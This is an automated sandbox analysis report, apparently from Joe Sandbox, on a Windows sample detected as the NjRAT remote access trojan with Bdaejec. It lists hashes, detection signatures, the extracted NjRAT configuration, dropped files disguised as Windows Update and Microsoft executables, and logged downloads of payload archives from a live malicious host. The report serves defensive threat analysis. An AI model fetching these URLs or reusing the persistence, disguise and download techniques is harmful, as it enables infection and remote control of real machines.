Windows Analysis Report
LisectAVT_2403002B_366.exe

Overview

General Information

Sample name: LisectAVT_2403002B_366.exe
Analysis ID: 1481747
MD5: 16ab569e9d84f0a2c9aacd47d4998d84
SHA1: df051511743f94a52bdbc270c4e5bf0d303d6975
SHA256: 7fb6d8e7d8bd58f1445f0c105d609bd3db7445d55d9abefc18e5e78c06b7a96f
Tags: exe, Worm, Ramnit

Detection

Bdaejec, Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Bdaejec
Yara detected Njrat
AI detected suspicious sample
Disables zone checking for all users
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
PE file contains section with special chars
PE file has a writeable .text section
PE file has nameless sections
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Name: NjRAT
Description: RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Attribution:
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

AV Detection

Source: LisectAVT_2403002B_366.exe Avira: detected
Source: http://ddos.dnsnb8.net:799/cj//k3.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar86) Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarZ Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarM Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarzO Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarH Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rara Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar#O Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar_ Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarPO Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar$ Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar1 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rareM Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar5 Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k4.rar Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarn Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarE Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarR Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rard Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp6 Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rarx Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarc Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarM Avira URL Cloud: Label: phishing
Source: C:\Program Files (x86)\Explower.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Notepad.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\server.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack Malware Configuration Extractor: Njrat {"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "8d9ba8e0d68a3d306883c186c2013957", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}
Source: Yara match File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Explower.exe Joe Sandbox ML: detected
Source: C:\Notepad.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: LisectAVT_2403002B_366.exe Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Unpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack
Source: LisectAVT_2403002B_366.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: LisectAVT_2403002B_366.exe Binary or memory string: [autorun]
Source: LisectAVT_2403002B_366.exe Binary or memory string: \autorun.inf
Source: LisectAVT_2403002B_366.exe Binary or memory string: autorun.inf
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: \autorun.inf
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: [autorun]
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: autorun.inf
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00AE29E2
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_009E9998 FindFirstFileW, 4_2_009E9998
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_009F9998 FindFirstFileW, 14_2_009F9998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 15_2_00A329E2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00979998 FindFirstFileW, 21_2_00979998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_005129E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 22_2_005129E2
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00AE2B8C
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 799
Source: global traffic TCP traffic: 192.168.2.6:49711 -> 44.221.84.105:799
Source: Joe Sandbox View IP Address: 44.221.84.105 44.221.84.105
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep, 1_2_00AE1099
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: RRqyIX.exe, 00000001.00000003.2148360236.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 0000000F.00000003.2336903520.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527841378.0000000000A33000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000002.2611797178.0000000000513000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000003.2607592735.00000000008E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar#O
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar1
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarH
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarM
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarPO
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar_
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rard
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rareM
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarzO
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245675608.0000000000C2A000.00000004.00000010.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar5
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar86)
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarE
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarM
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarR
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarZ
Source: RRqyIX.exe, 00000001.00000002.2244767719.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp6
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rara
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarx
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar$
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.1.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.comDeepak
Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.enigmaprotector.com/
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.enigmaprotector.com/openU
Source: SciTE.exe.1.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\server.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Window created: window name: CLIPBRDWNDCLASS
Source: SciTE.exe.1.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_2cc260de-a

E-Banking Fraud

Source: Yara match File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

System Summary

Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: RRqyIX.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name:
